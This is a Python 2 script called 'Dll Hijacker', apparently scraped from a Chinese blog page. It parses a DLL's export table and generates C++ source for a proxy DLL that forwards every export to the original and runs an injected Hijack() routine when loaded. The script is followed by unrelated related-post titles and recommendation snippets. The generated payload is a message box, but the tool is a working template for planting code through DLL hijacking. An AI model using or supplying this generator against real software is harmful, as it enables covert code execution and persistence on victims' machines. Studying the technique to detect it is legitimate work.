#coding=utf-8

#

# Dll Hijacker

#

# platform: Python 2.x @ Windows

#

# author:Coca1ne

import os,sys,time

import pefile

def main():

    try:

        pe = pefile.PE(sys.argv[1])

        exportTable = pe.DIRECTORY_ENTRY_EXPORT.symbols

        print "[!]Find export function :[ %d ]\r\n" % len(exportTable)

        for exptab in exportTable:

            print "%3s %10s" % (exptab.ordinal, exptab.name)

        print "\r\n[+] generating DLL Hijack cpp file ..."

        generate(exportTable)

        print "\r\n[+] generating DLL Hijack cpp file has finished!"

    except Exception, e:

        print e

def generate(exportTable):

    segments = r"//Generate by DLLHijacker.py\

\

#include <Windows.h>\

\

DEFINE_DLL_EXPORT_FUNC\

#define EXTERNC extern \"C\"\

#define NAKED __declspec(naked)\

#define EXPORT __declspec(dllexport)\

#define ALCPP EXPORT NAKED\

#define ALSTD EXTERNC EXPORT NAKED void __stdcall\

#define ALCFAST EXTERNC EXPORT NAKED void __fastcall\

#define ALCDECL EXTERNC NAKED void __cdecl\

\

namespace DLLHijacker\

{\

    HMODULE m_hModule = NULL;\

    DWORD m_dwReturn[17] = {0};\

    inline BOOL WINAPI Load()\

    {\

        TCHAR tzPath[MAX_PATH];\

        lstrcpy(tzPath, TEXT(\"DLL_FILENAME.dll\"));\

        m_hModule = LoadLibrary(tzPath);\

        if (m_hModule == NULL)\

            return FALSE;\

        return (m_hModule != NULL);\

    }\

    inline VOID WINAPI Free()\

    {\

        if (m_hModule)\

            FreeLibrary(m_hModule);\

    }\

    FARPROC WINAPI GetAddress(PCSTR pszProcName)\

    {\

        FARPROC fpAddress;\

        CHAR szProcName[16];\

        fpAddress = GetProcAddress(m_hModule, pszProcName);\

        if (fpAddress == NULL)\

        {\

            if (HIWORD(pszProcName) == 0)\

            {\

                wsprintf(szProcName, \"%d\", pszProcName);\

                pszProcName = szProcName;\

            }\

            ExitProcess(-2);\

        }\

        return fpAddress;\

    }\

}\

using namespace DLLHijacker;\

VOID Hijack()\

{\

    MessageBoxW(NULL, L\"DLL Hijack! by DLLHijacker\", L\":)\", 0);\

}\

BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)\

{\

    if (dwReason == DLL_PROCESS_ATTACH)\

    {\

        DisableThreadLibraryCalls(hModule);\

        if(Load())\

            Hijack();\

    }\

    else if (dwReason == DLL_PROCESS_DETACH)\

    {\

        Free();\

    }\

    return TRUE;\

}\

"

    filename = sys.argv[1][sys.argv[1].rindex('\\')+1:sys.argv[1].rindex('.')]

    fp = open(filename + ".cpp", "w+")

    define_dll_exp_func = ""

    for exptable in exportTable:

        define_dll_exp_func += r"#pragma comment(linker, \"/EXPORT:" + str(exptable.name) +\

                            "=_DLLHijacker_" + str(exptable.name) + ",@"+ str(exptable.ordinal) +"\")\n"

    segments = segments.replace('DLL_FILENAME', filename)

    segments = segments.replace("DEFINE_DLL_EXPORT_FUNC", define_dll_exp_func).replace('\\','')

    fp.writelines(segments)

    forward_dll_exp_func = ""

    for exptable in exportTable:

        forward_dll_exp_func += "ALCDECL DLLHijacker_"+ str(exptable.name) +"(void)\n{" + \

                            "\n        __asm POP m_dwReturn[0 * TYPE long];\n    GetAddress(\""+ \

                            str(exptable.name) + "\")();\n    __asm JMP m_dwReturn[0 * TYPE long];\n}\r\n"

    fp.writelines(forward_dll_exp_func)

    fp.close()

def usage():

    print "Usage:"

    print "    %s c:\\windows\\system32\\msimg32.dll" % sys.argv[0]

if __name__ == "__main__":

    if(len(sys.argv) <2):

        usage()

    else:

        main()

Dll Hijacker的更多相关文章

  1. 使用powershell提权的一些技巧

    原文:http://fuzzysecurity.com/tutorials/16.html 翻译:http://www.myexception.cn/windows/1752546.html http ...

  2. metasploit--exploit模块信息

    Name                                             Disclosure Date  Rank    Description ----           ...

  3. Kali linux 2016.2(Rolling)中的Exploits模块详解

    简单来将,这个Exploits模块,就是针对不同的已知漏洞的利用程序. root@kali:~# msfconsole Unable to handle kernel NULL pointer der ...

  4. dll文件32位64位检测工具以及Windows文件夹SysWow64的坑

    自从操作系统升级到64位以后,就要不断的需要面对32位.64位的问题.相信有很多人并不是很清楚32位程序与64位程序的区别,以及Program Files (x86),Program Files的区别 ...

  5. C#创建dll类库

    类库让我们的代码可复用,我们只需要在类库中声明变量一次,就能在接下来的过程中无数次地使用,而无需在每次使用前都要声明它.这样一来,就节省了我们的内存空间.而想要在类库添加什么类,还需取决于类库要实现哪 ...

  6. 关于Linux和Windows下部署mysql.data.dll的注册问题

    mysql ado.net connector下载地址: http://dev.mysql.com/downloads/connector/net/ 选择版本: Generally Available ...

  7. Windows平台Go调用DLL的坑

    最近的项目中,使用了GO来开发一些服务中转程序.业务比较简单,但是有一些业务需要复用原有C++开发的代码.而在WINDOWS,用CGO方式来集成C/C++代码并不是太方便.所以用DLL把C++的代码封 ...

  8. C#开发奇技淫巧三:把dll放在不同的目录让你的程序更整洁

    系列文章 C#开发奇技淫巧一:调试windows系统服务 C#开发奇技淫巧二:根据dll文件加载C++或者Delphi插件 C#开发奇技淫巧三:把dll放在不同的目录让你的程序更整洁 程序目录的整理 ...

  9. .Net使用Newtonsoft.Json.dll(JSON.NET)对象序列化成json、反序列化json示例教程

    JSON作为一种轻量级的数据交换格式,简单灵活,被很多系统用来数据交互,作为一名.NET开发人员,JSON.NET无疑是最好的序列化框架,支持XML和JSON序列化,高性能,免费开源,支持LINQ查询 ...

随机推荐

  1. SpringBoot与消息(RabbitMQ)

    1. JMS和AMQP JMS(Java Message Service): ActiveMQ是JMS实现; AMQP(Advanced Message Queuing Protocol) 兼容JMS ...

  2. MySQL优化(三):优化数据库对象

    二.优化数据库对象 1.优化表的数据类型 应用设计的时候需要考虑字段的长度留有一定的冗余,但不推荐很多字段都留有大量的冗余,这样既浪费磁盘空间,也在应用操作时浪费物理内存. 在MySQL中,可以使用函 ...

  3. Flask用Flask-SQLAlchemy连接MySQL

    安装 pip3 install Flask-SQLAlchemy 测试环境目录结构 settings.py DIALECT = 'mysql' DRIVER = 'pymysql' USERNAME ...

  4. 关闭linux的防火墙

    有两道防火墙 第一道 iptables -L iptables -F systemctl disable firewalld 第二道 [root@python3 ~]# getenforce Enfo ...

  5. shell_01

    定义变量: name='qwer' 不解析任何字符 name="qwer" 会解析$和\特殊字符 name1=123;name2=456 定义多个变量 now_date=`date ...

  6. docker部署Jenkins,以及在Jenkins中使用宿主机的docker/docker-compose命令

    使用最新的官方镜像jenkins/jenkins 第一次使用的docker部署jenkins的时候,出现了两个问题: 1.因为用户权限问题挂载/home/jenkins/data到/var/jenki ...

  7. Windows服务的安装、卸载

    创建一个Windows服务 http://jingyan.baidu.com/article/fa4125acb71a8628ac709226.html 安装服务 使用FramWork框架自带的Ins ...

  8. windows server 2008 r2 IIS 6 元数据库与IIS 6 配置的兼容性 解决方案

    1 菜单-管理工具-服务器管理 2 添加角色服务 3 选中 IIS6 管理兼容性 4 安装完成 5 在IIS上新建一个相应端口的网站 6重新加载项目,OK

  9. Go实现查找目录下(包括子目录)替换文件内容

    [功能] 按指定的目录查找出文件,如果有子目录,子目录也将进行搜索,将其中的文件内容进行替换. [缺陷] 1. 没有过滤出文本文件 2. 当文件过大时,效率不高 [代码] package main i ...

  10. python 之操作mysql 数据库实例

    对于python操作mysql 数据库,具体的步骤应为: 1. 连接上mysql host 端口号 数据库 账号 密码2. 建立游标3. 执行sql(注意,如果是update,insert,delet ...